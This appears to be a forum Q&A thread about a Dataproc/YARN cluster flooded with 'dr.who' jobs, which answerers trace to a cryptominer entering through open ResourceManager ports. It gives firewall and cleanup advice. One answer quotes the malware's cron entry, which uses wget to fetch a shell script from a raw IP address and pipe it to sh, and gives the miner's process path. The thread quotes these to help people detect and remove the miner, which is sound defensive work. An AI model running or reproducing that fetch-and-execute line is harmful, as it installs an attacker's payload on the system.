After a dataproc cluster is created, many jobs are submitted automatically to ResourceManager by user dr.who. This is starving the resources of the cluster and eventually overwhelms the cluster so.
There is little to no information in the logs.
Is anyone else experiencing this issue in dataproc?
Without knowing more, here is what I suspect is going on.
- It sounds like your cluster has been compromised
- Your firewall (network) rules are likely open, allowing any traffic into the cluster
- Someone has discovered your cluster is open to the public internet and is taking advantage of it
I recommend you do the following immediately:
- Secure the firewall rules you're using to prevent outside access; do not open ports to the public internet
- If you are not using your Cloud Dataproc cluster(s), delete them
- If you had any jobs or data on that cluster, you should consider that data as potentially compromised (as anyone could access the cluster)
If you need to access WebUIs on the cluster, you should use a SOCKS proxy and SSH.
What is probably hapenning to you:
- the hacker scans every open vulnerability (IP address + port) and stores them to a breach table
- the hacker scans the breach table and tries to figure out whether you launched or not a cluster recently
- when a vulnerable cluster is available, the hacker connects to it (everything is open and a vulnerability has been found!)
- the guy connects to your cluster, removes everything (in my case, the script is named
zz.sh
and you can find it in the BitBucket link below) then downloads the mining app
- YARN thinks that workers are failing but I don't even think that a Hadoop application is running anymore.
I suggest you try to find a bitbucket/github address in your error logs. Also you can try to look for a get/wget/apt-get/curl command.
I guess he's rich now.
Two important things:
- check that your security group configuration is strong enough, without public authorizations everywhere
- check that your SSH key is not compromised.
What you need to do:
The idea is to block unecessary open ports with an updated security group policy and use a VPC if needed. I will describe the first option with main steps to follow.
- [OPTIONAL] change your SSH keys (caution: this can easily break things in your system, to do carefully)
- go to your EC2 screen > Network and security > Security groups
- Create a new security group and configure possible connections only from a master and its nodes (you can setup an input connection to be from a given security group).
- use the security group described in (3) when launching a new EC2/EMR instance. (it should appear when checking the cluster security configuration)
Related:
- yarn-dr-who-application-attempt-fail
- how-to-use-the-resourcemanager-web-interface-as-an-user
- hdp-261-virus-crytalminer-drwho.html
The virus is a cryptocurrency miner that creates thousands of dr. who jobs like what you describe. The jobs are there to "reinstall" the crypto miner if you try to remove it. Here is how to remove the miner permanently.
Check for cron jobs as yarn on each node that are suspicious and remove them.
$ sudo -u yarn crontab -e
*/2 * * * * wget -q -O - http://185.222.210.59/cr.sh | sh > /dev/null 2>&1
Then check for a "java" process like this one and kill it.
/var/tmp/java -c /var/tmp/wc.conf
You also need to secure all the incoming ports to your cluster to prevent this from coming back. Especially your resource manager ports.
See this for more info too. https://community.hortonworks.com/questions/191898/hdp-261-virus-crytalminer-drwho.html
GCP:
if u have to change your security group default:ssh(make it tcp:22)
.I think it will help u to solve your problem.